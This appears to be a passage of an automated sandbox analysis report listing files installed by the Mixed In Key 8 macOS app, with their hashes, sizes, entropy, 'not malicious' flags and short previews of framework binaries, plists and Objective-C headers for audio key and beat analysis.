                                                                                                    Preview: ................!...................X...__TEXT..........................................................__text..........__TEXT...........r......<........r..............................__stubs.........__TEXT...........y......0........y..............................__stub_helper...__TEXT...........z......`........z..............................__const.........__TEXT..........pz..............pz..............................__cstring.......__TEXT...........{......!........{..............................__objc_methname.__TEXT..........1{......+.......1{..............................__swift3_typeref__TEXT..........`{......d.......`{..............................__swift3_assocty__TEXT...........{...............{..............................__swift2_proto..__TEXT...........{...............{..............................__swift3_fieldmd__TEXT...........{...............{..............................__info_plist....__TEXT...........|......I........|..............................__unwind_info...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_ml4gNk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):69936
                                                                                                    Entropy (8bit):4.938009084056817
                                                                                                    Encrypted:false
                                                                                                    MD5:9D7F9A3116555FA2C2FFA214FE7BA30C
                                                                                                    SHA1:8879A5454ED72E53CE770DCCC4122F68E29949F7
                                                                                                    SHA-256:A91A9077FAC4CC14B58D4ECEAC6ACE8CFBC1CD24C2278BC57A980B86ECAA1446
                                                                                                    SHA-512:FF38E0D6D2E7FBAAF2176015E572251B571C9668DEAF93197227180F6023E0F616F2F0C9751E29CAB42436CD9A08020E267157CED4F23B8F714110C657DDA439
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................................H...__TEXT...................p...............p......................__text..........__TEXT...........3...............3..............................__stubs.........__TEXT...........a...............a..............................__stub_helper...__TEXT..........Lb......<.......Lb..............................__cstring.......__TEXT...........c...............c..............................__objc_methname.__TEXT...........d...............d..............................__const.........__TEXT...........d...............d..............................__swift3_typeref__TEXT...........e...............e..............................__swift3_reflstr__TEXT...........g...............g..............................__swift3_fieldmd__TEXT...........g......T........g..............................__swift3_capture__TEXT...........g......$........g..............................__swift3_assocty__TEXT...........h......`........h..............................__swift2_proto..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_myETqW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):6160784
                                                                                                    Entropy (8bit):6.454677329710664
                                                                                                    Encrypted:false
                                                                                                    MD5:AA6CD3EC59353F17E55A42B57E9BB826
                                                                                                    SHA1:B33C2523B526B72767179A203C3E1506B8D98A1B
                                                                                                    SHA-256:7B93344A8F57714DC6A7247A02183A4F96C2FF7F3194707D7A7F30B526C91133
                                                                                                    SHA-512:7FAFC3A54BD5723AA2F073B00A9C29A3B9C7542F59EA2D3DAB121702FEA737B5BDB70BC9A318764E0BD540755694CF80AD0776DE168B15F243D1AD9B550453EB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT...................@5..............@5.....................__text..........__TEXT...........8........1......8..............................__stubs.........__TEXT............1...............1.............................__stub_helper...__TEXT............1...............1.............................__const.........__TEXT............1.....0.........1.............................__cstring.......__TEXT.......... .2............. .2.............................__objc_methname.__TEXT...........;3.....h........;3.............................__swift3_typeref__TEXT..........PB3......r......PB3.............................__swift3_capture__TEXT............3.....8.........3.............................__swift3_reflstr__TEXT.......... .3............. .3.............................__swift3_fieldmd__TEXT............3.....X<........3.............................__ustring.......__TEXT..........8.4.............8.4.............................__swift3_assocty
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_oSnqYE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):2858224
                                                                                                    Entropy (8bit):6.506547716239084
                                                                                                    Encrypted:false
                                                                                                    MD5:B912D7A34E7F3414CF3E2FFADCFA2DBE
                                                                                                    SHA1:314C1C2C620BDBE578A527484803FCEB300ECB56
                                                                                                    SHA-256:A2813BBB6B4E5B42A319CCD09451846B0D814F5D29B27F27BAFE3750DEDD2BD2
                                                                                                    SHA-512:DB174DB61FF5FDDFE968A8629CD94E62CDC7D544ED8311F84D03045482C92D475E5D5700493C03EE9C080D4650474E48090E962204840F72D55A0CEB7E51D511
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................`...................__TEXT...................P...............P......................__text..........__TEXT..........p\..............p\..............................__stubs.........__TEXT..........\l..............\l..............................__stub_helper...__TEXT...........t......R........t..............................__const.........__TEXT..........@........U......@...............................__cstring.......__TEXT...................5......................................__objc_methname.__TEXT..................^8......................................__swift3_typeref__TEXT...........G.......=.......G..............................__swift3_capture__TEXT..........................................................__swift3_reflstr__TEXT..........................................................__swift3_fieldmd__TEXT..........0.......l.......0...............................__swift3_assocty__TEXT..........................................................__swift2_proto..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_uRjmqv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):98496
                                                                                                    Entropy (8bit):5.406334713118758
                                                                                                    Encrypted:false
                                                                                                    MD5:53EBCB72C82ACCA0858624E133DC8C75
                                                                                                    SHA1:C4E5A57D8EF0343966FA7172CA4F754C79010C60
                                                                                                    SHA-256:6563157FD2A72CCDDB7D4167B7491A424AB3B98183E3DFF14F010401A6FDB35A
                                                                                                    SHA-512:015D4EB149C4294A9D72197D5E1B98E5D22CC5EC50C3FB4F92339EF7D6490FC6EC3C8EE17A369D99FBA33B9BF29C60ADDFDF2D7774354F0457A30C1E406BD7B5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT..........................................................__text..........__TEXT..........@&.......F......@&..............................__stubs.........__TEXT...........l......d........l..............................__stub_helper...__TEXT..........Po..............Po..............................__const.........__TEXT..........`s..............`s..............................__cstring.......__TEXT.......... u.............. u..............................__swift3_typeref__TEXT...........u...............u..............................__swift3_capture__TEXT...........w......P........w..............................__swift3_reflstr__TEXT..........Xw..............Xw..............................__swift3_fieldmd__TEXT..........`w..............`w..............................__swift3_builtin__TEXT..........|w......(.......|w..............................__swift3_assocty__TEXT...........w......H........w..............................__swift2_proto..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_zPRief
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):81792
                                                                                                    Entropy (8bit):4.957162317687213
                                                                                                    Encrypted:false
                                                                                                    MD5:EE02C1BA57D5563D61504A97B751D8E1
                                                                                                    SHA1:FA31800B62977AF3526E05AC6E04557645D15958
                                                                                                    SHA-256:421DC06E1A9C7C295957100D922DBFC028C0C9490E7B6FA624FDA7EC27FED8CE
                                                                                                    SHA-512:F46638AB8301DD1B4A99121FEA9BE14DA3D932982C52E3C71A7C2A905F68A2E5979F86395035190501D491DF3BA4173CE71F5996D828627E4B411E0E3FD33BE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................P...............X...__TEXT..........................................................__text..........__TEXT...........B.......1.......B..............................__stubs.........__TEXT..........\t......~.......\t..............................__stub_helper...__TEXT...........t...............t..............................__const.........__TEXT...........u......j........u..............................__swift3_typeref__TEXT..........0w..............0w..............................__swift3_reflstr__TEXT...........y...............y..............................__swift3_fieldmd__TEXT..........(y..............(y..............................__swift3_assocty__TEXT..........Dy..............Dy..............................__swift2_proto..__TEXT..........0z......P.......0z..............................__swift3_builtin__TEXT...........z......(........z..............................__info_plist....__TEXT...........z......G........z..............................__unwind_info...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_zhF7MD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):311296
                                                                                                    Entropy (8bit):5.91467987599657
                                                                                                    Encrypted:false
                                                                                                    MD5:635674CC13B781ACCB0D19DCC799B7A5
                                                                                                    SHA1:F8A6ECA72C462898CD00492263A49251D9D657CF
                                                                                                    SHA-256:7BFEBFF3964C0C2ED3FD4D697A5B787710ACCB1C2820198FAE1241081625135E
                                                                                                    SHA-512:AB1B6B9EE46956E382EFB9DC395B28365986F87C649254D9700DBB191A28250FCF2EE3B76B68D3167A85EA0EA8D315D77997E20A9BD8D484CB19333FBD7DCC5F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................p...............8...__TEXT..........................................................__text..........__TEXT...........A......9/.......A..............................__stubs.........__TEXT...........p......6........p..............................__stub_helper...__TEXT..........0t......j.......0t..............................__const.........__TEXT...........y...............y..............................__cstring.......__TEXT..................U.......................................__swift3_typeref__TEXT..................d.......................................__swift3_capture__TEXT..........d.......P.......d...............................__swift3_reflstr__TEXT..................L.......................................__swift3_fieldmd__TEXT..........................................................__swift3_assocty__TEXT..........................................................__swift2_proto..__TEXT..................p.......................................__swift2_types..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/.BC.T_R452Ac
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):1799120
                                                                                                    Entropy (8bit):6.5073881224127526
                                                                                                    Encrypted:false
                                                                                                    MD5:FDA11F36E166AA91D07AB8670E83F516
                                                                                                    SHA1:4FA0A50BE9D9B62547E013EAB199B41A2DF59BAA
                                                                                                    SHA-256:AB500751465B470C16F8605A9964D82A823BC0C0B8AB3A54445041D79DFC72F2
                                                                                                    SHA-512:FA04AC6163F1B9D0C29C68E5E14C4FB695CCD9FE1585D166D9B5F5BBB33BE6CE6B148461B96C611E6A055C3C0C77CBA6FA3469BACCE7DD673E379AA7DF665F51
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................`...................__TEXT...................P...............P......................__text..........__TEXT........... .......D....... ..............................__stubs.........__TEXT...........d...............d..............................__stub_helper...__TEXT..........Xk..............Xk..............................__gcc_except_tab__TEXT..........Dv..............Dv..............................__const.........__TEXT...........].......R.......]..............................__cstring.......__TEXT..................=.......................................__objc_methname.__TEXT...........5......*........5..............................__objc_classname__TEXT..........'T..............'T..............................__objc_methtype.__TEXT...........V...............V..............................__unwind_info...__TEXT...........%.......K.......%..............................__eh_frame......__TEXT..........xq......x.......xq......................................__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/.BC.T_fPouHv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1392
                                                                                                    Entropy (8bit):5.197175787096031
                                                                                                    Encrypted:false
                                                                                                    MD5:C02E9853E2E5AB1933AD559842C08252
                                                                                                    SHA1:343F3777FE2FE423DE6061AAF866D8DFCD921202
                                                                                                    SHA-256:3DF14511C12BCDA716B6750A1A213DA098E5882F8A032F86490297DBC4C79B44
                                                                                                    SHA-512:0951AE00077BB87D738D9C230B42FCE66A1A07476A9819D5176F0A05A844607ADB428222EC3B95A7F76D16BFCF9825B2B28A271DEE3BF9C5B7A9C9C456C36EEF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>DanceabilityAudioEngine</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.energetic.DanceabilityAudioEngine</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>DanceabilityAudioEngine</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/.BC.T_FvvhWi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text
                                                                                                    Size (bytes):92
                                                                                                    Entropy (8bit):3.2610300066712608
                                                                                                    Encrypted:false
                                                                                                    MD5:51EF59B60E5B41B91519CC662A9FE886
                                                                                                    SHA1:3222CA0C39EB50AAF8126BAF852E55430C4718AF
                                                                                                    SHA-256:39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
                                                                                                    SHA-512:3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. .*./.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/.BC.T_jtnRA4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):2953
                                                                                                    Entropy (8bit):4.994516456350389
                                                                                                    Encrypted:false
                                                                                                    MD5:E1002528A672D80FE4DC9FFED0184217
                                                                                                    SHA1:985E45C30FBEEC840430C270769CF6BFCBFEE83D
                                                                                                    SHA-256:54ADA1D33BE97161AFEBF8B79C053FE5F1730D4EFFE085AD71C3EEC074E925B2
                                                                                                    SHA-512:98983B485DAE9FDDC7480C7FA65B2DCCA887AA957821D390345D65FF2748F73FC80CDC52DD61EB181C4FC1B5947CBFA72E9E8C226A2AA7DF1C06EE0E3554CF6E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...ND83d/4v5CPeYGGq+GbY382SEgI=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....ND83d/4v5CPeYGGq+GbY382SEgI=....</data>....<key>hash2</key>....<data>....PfFFEcErzacWtnUKGiE9oJjliC+KAy+GSQKX28THm0Q=....</data>...</dict>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>hash2</key>....<data>....Oc8u4Ht7Mz58F50L9NeYpbcq9qTlhPUeZCcDu/pPyCg=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>rules</key>..<d
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/.BC.T_c9uuWH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):505920
                                                                                                    Entropy (8bit):6.22820383312003
                                                                                                    Encrypted:false
                                                                                                    MD5:97D4ACAD87C8211C1DBBF525B19A783D
                                                                                                    SHA1:9357621715356EAE618B627FBFC58243F429248D
                                                                                                    SHA-256:FE87DD1A4FE8A99E6BA61F74C15044AF54433DEC6FB0BAA052D35B68AA98765D
                                                                                                    SHA-512:0776E89240F7B670549D76D8F77E554DA6B5CABAF7E611C570F3FD666CC4B8FEA285046DCCC1D381F16EB55742B8301EEF853EC6D4307A557C260F20ECBAF98A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................(...................__TEXT...................P...............P......................__text..........__TEXT..........................................................__stubs.........__TEXT..........b...............b...............................__stub_helper...__TEXT..........t...............t...............................__const.........__TEXT..........................................................__cstring.......__TEXT..........x.......=.......x...............................__objc_methname.__TEXT..........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT...................G......................................__gcc_except_tab__TEXT...........V.......).......V..............................__unwind_info...__TEXT..........h...............h...............................__eh_frame......__TEXT..........H...............H.......................................__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_7vJkmg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):648
                                                                                                    Entropy (8bit):5.148336056806373
                                                                                                    Encrypted:false
                                                                                                    MD5:4B371DF3A96CD1297623B91665EFA627
                                                                                                    SHA1:D27EF8EF6C7A2F9077DE19CAE4CACF14227CFBA0
                                                                                                    SHA-256:0E63C55A275CD1EDBC809392BD74B89C573D7E4900FD0A64837E56B45FF3A4A8
                                                                                                    SHA-512:D575C6D232E344094D46CFB723D670773A89A3DB6D9880CFCEE2305204FC9351CCF021F7E766C4C3EB241BEE61A5326C37502A5FD2D6DE8773459BF61EAA1FB4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKAnalysisCuePoint.h.// MIKAnalysis.//.// Created by Martin Douglas on 24/06/2016..// Copyright .. 2016 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>..@interface MIKAnalysisCuePoint : NSObject <NSCoding>.+ (instancetype)cuePointWithTime:(NSTimeInterval)time energyLevel:(NSUInteger)energyLevel;.+ (instancetype)cuePointWithJSONDictionary:(NSDictionary *)JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary *)JSONDict;..@property (nonatomic, readonly, copy) NSDictionary *JSONDict;.@property (nonatomic, readonly) NSTimeInterval time;.@property (nonatomic, readonly) NSUInteger energyLevel;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_IyDVdE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1820
                                                                                                    Entropy (8bit):5.003113809377265
                                                                                                    Encrypted:false
                                                                                                    MD5:371151931C963B42F0783A22596ED5E2
                                                                                                    SHA1:AEEAC619F69DF09138B5DEA6E7C550DF78307C9A
                                                                                                    SHA-256:7FBFD1A04391AB3D82116B23B4BBA80094292929BE72314631F81FB6E249FDD8
                                                                                                    SHA-512:454EE0326D29A65AE319C9D51EC2DEB325F8D4A3DBF528F33D98C527016AF67747C6C3B6EB0541CF277193E655ED0A36D99F1E72CA7D6BA24D3F0D1B873BB732
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKAnalysisSegment.h.// MixedInKey.//.// Created by patrickm on 06-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.../*!. @header..MIKKeySegment. @abstract Represents file segments. @discussion This is an intermediary object, used to store file analysis.....parameters, and to send / receive analysis.results to / from the.....web service. The final results are transferred to MIKDataSongKeySegment.....objects for storage in the database..*/.@interface MIKAnalysisSegment : NSObject <NSCopying, NSCoding>.+ (instancetype)segment;.+ (instancetype)segmentWithJSONDictionary:(NSDictionary *)JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary *)JSONDict;.- (NSComparisonResult)chronologicalCompare:(MIKAnalysisSegment *)otherSegment;..@property (nonatomic, readonly, copy) NSDictionary *JSONDict;.@property (nonatomic, readwrite) float pitch;........//.range pitch.@property (nonatomic, readwrite, copy) NSArray *fea
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_PohI1a
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1374
                                                                                                    Entropy (8bit):5.247853330766811
                                                                                                    Encrypted:false
                                                                                                    MD5:4240145BF057EE0ADB3DA147CB0A4618
                                                                                                    SHA1:AC36C6CBAB2926B67172E6A1561F1E7C4886906F
                                                                                                    SHA-256:F2DC4B7422FF4A50C29D7EC19EDA0175265ECA5DCA48D5FCE01CF9D6FABE657E
                                                                                                    SHA-512:85B2BE9DA25EAA080D5905631E548022292FDCD207B514BE72D6BC00F9DD3FD4EA7926380C8C2C9CF9DB8DA64897E366C552E82ADAB06307AE96CF874FF6D595
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKBeatAnalyzer.h.// MixedInKey.//.// Created by patrickm on 28-07-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...//.speed adaption type for aufTAKT.typedef float MIKBeatAdaptionSpeed;..//.speed adaption values.#define MIKBeatAdaptionSpeedDefault.. 0.0 ./* min value, aufTAKT default */.#define MIKBeatAdaptionSpeedFast.. 1.0.#define MIKBeatAdaptionSpeedSlow..50.0./* max value */...@class MIKBeats;.@interface MIKBeatAnalyzer : NSObject.- (instancetype)initWithNumberOfChannels:(NSUInteger)channels NS_DESIGNATED_INITIALIZER;..- (void)setAdaptationSpeed:(Float32)adaptationSpeed;.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)bufferRef;.- (BOOL)finishAnalysis;..@property (nonatomic, class) int aufTAKTVersion;.....//.aufTAKT version to use
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_QFr6uW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1983
                                                                                                    Entropy (8bit):5.019316369415542
                                                                                                    Encrypted:false
                                                                                                    MD5:797165154EB9ACB62D168FEE4C2B1335
                                                                                                    SHA1:E512EEAD5840C5B3DEFF95FAE69E40C39ADA047E
                                                                                                    SHA-256:AB8DE79C660FD13F4C3AC21FDE519146D69F8208157F33817E522CD642D8DD86
                                                                                                    SHA-512:D51335EED907E10D9753785D575373E4FE7D7FEF2D66D209B1F29921958CAF4FFA454239E2190989D59BD1D791A9D9CCC103DDA8731437029626B323F92EC203
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKKeytable.h.// MixedInKey.//.// Created by patrickm on 09-05-08..// Copyright 2008 Yakov Vorobyev. All rights reserved..//..#import <Cocoa/Cocoa.h>...typedef NS_ENUM(unsigned int, MIKKeyNotation) {..MIKKeyNotationCamelot.= 0,..MIKKeyNotationFlat,..MIKKeyNotationSharp,..MIKKeyNotationMusicalFlat,.../* for id3 tags */..MIKKeyNotationMusicalSharp,..MIKKeyNotationCount.};...//.key names in the given notation, in order.NSArray *MIKKeyNames(MIKKeyNotation notation);..//.get the equivalent index of a key in Camelot notation.NSUInteger MIKIndexForCamelotKey(NSString *camelotKey);..//.get the equivalent index of a key in any notation.NSUInteger MIKIndexForKey(NSString *key);..//.get the index for the equivalent major key.NSUInteger MIKMajorIndexForCamelotKey(NSString *camelotKey);..//.get the index for the equivalent minor key.NSUInteger MIKMinorIndexForCamelotKey(NSString *camelotKey);..//.get the string value of a single key. returns @"" if theKey == NSNotFound.NSString *MIKKeyStr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_UokQOc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):713
                                                                                                    Entropy (8bit):5.228786670227974
                                                                                                    Encrypted:false
                                                                                                    MD5:D57F080AF15C84F15A2F1EFE0E0204CB
                                                                                                    SHA1:A80E37DE5193CB3DF9EDC1B80E20C30C4DAF87A5
                                                                                                    SHA-256:79F34169EBF50E13769111021416BE5FB098785EBD2E53233E318B5E37DAEB22
                                                                                                    SHA-512:E647C12B0C9EFEC3066ED39FC3A8CDEE06BE4BACC5B6399F758328EB55BA4E4567714028839F3FFAFB22A109E891710767B42413CB88BA191D159727BF63DAC6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKNewKeyAnalyzer.h.// MIKAnalysis.//.// Created by patrickm on 12-09-13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...@class MIKAnalysisSegment;.@interface MIKNewKeyAnalyzer : NSObject..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(const AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;.- (void)getResult:(MIKAnalysisSegment *)result;..@property (nonatomic, readonly, class) int algorithmVersion;.@property (nonatomic, readonly) MIKAnalysisSegment *result;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_Y6mCvi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):686
                                                                                                    Entropy (8bit):4.967762859263273
                                                                                                    Encrypted:false
                                                                                                    MD5:6E7E1D9DD0AC8C2F9BE429D195ADD640
                                                                                                    SHA1:6C194CAB79175EA1BA3EEE3E709C6BC15245B761
                                                                                                    SHA-256:E28C287D02B3B094B2808BAA8C0482E8F9AB8ACBE0ED18982B079EF8EE9ABC82
